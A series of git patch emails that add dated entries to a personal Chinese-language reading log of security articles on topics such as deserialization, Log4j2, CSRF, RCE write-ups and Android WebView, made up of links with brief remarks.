[红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** ++ [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** From ec064e1bd7cdbb212e57845800de22a5a1216c51 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Dec 2022 14:20:43 +0800 Subject: [PATCH 230/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7198c30..99c7f33 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -224,3 +224,4 @@ + 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** ++ 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** From b79e592babf114fee514f1524b96ea132485502c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Dec 2022 15:34:55 +0800 Subject: [PATCH 231/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 99c7f33..512d727 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -225,3 +225,4 @@ + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** ++ 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** From 90a97719fb1a4a01ed329cd3761c7dbecb932d6d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 27 Dec 2022 16:40:54 +0800 Subject: [PATCH 232/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 512d727..7c1f657 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -226,3 +226,4 @@ + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** ++ 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) From 5065bedf5af76a0892d971dcf9555ce75328d45f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 13:03:35 +0800 Subject: [PATCH 233/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7c1f657..ff8ff2c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -227,3 +227,4 @@ + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) ++ 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** From 03ca852697d7af343d590f5c535fa8b46d08e5ef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 13:11:58 +0800 Subject: [PATCH 234/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff8ff2c..6b0de79 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -228,3 +228,4 @@ + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) + 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** ++ 2022/12/28 [Android 远程攻击面——WebView 攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** From ed5ddcb089a34a498562bef0f1ba67790cfb2d25 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 19:08:32 +0800 Subject: [PATCH 235/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6b0de79..d230a63 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -229,3 +229,4 @@ + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) + 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** + 2022/12/28 [Android 远程攻击面——WebView 攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** ++ 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** From 378a2f2e002f3ae1a01fcbc90af3db7533b50752 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Dec 2022 12:50:12 +0800 Subject: [PATCH 236/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 ++ 1 file changed, 2 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d230a63..49fb0c7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -230,3 +230,5 @@ + 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** + 2022/12/28 [Android 远程攻击面——WebView 攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** ++ 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** From 915aa84993cf6fa5b3aa5a9818e93b468b7b008f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 00:20:16 +0800 Subject: [PATCH 237/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 49fb0c7..603f323 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -232,3 +232,6 @@ + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** + 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** + +## 2023 ++ 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** From 7f0ca5f8a3fb33ddf178cf4032d9cf6e75eb3044 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 00:22:21 +0800 Subject: [PATCH 238/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 603f323..a28942e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -232,6 +232,7 @@ + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** + 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** ++ 2022/12/31 嗯其实没有看什么文章主要是在写代码,还是假装记录一下。新年快乐!!! ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** From 8e0db0695dc943634bea02e9063ed249f550d5c0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 19:07:54 +0800 Subject: [PATCH 239/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a28942e..db8701a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -236,3 +236,4 @@ ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** ++ 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** From 3c6df7884f3ddf7dfccc922265c17a8e53725064 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 4 Jan 2023 15:37:54 +0800 Subject: [PATCH 240/332] Update Readme.md --- 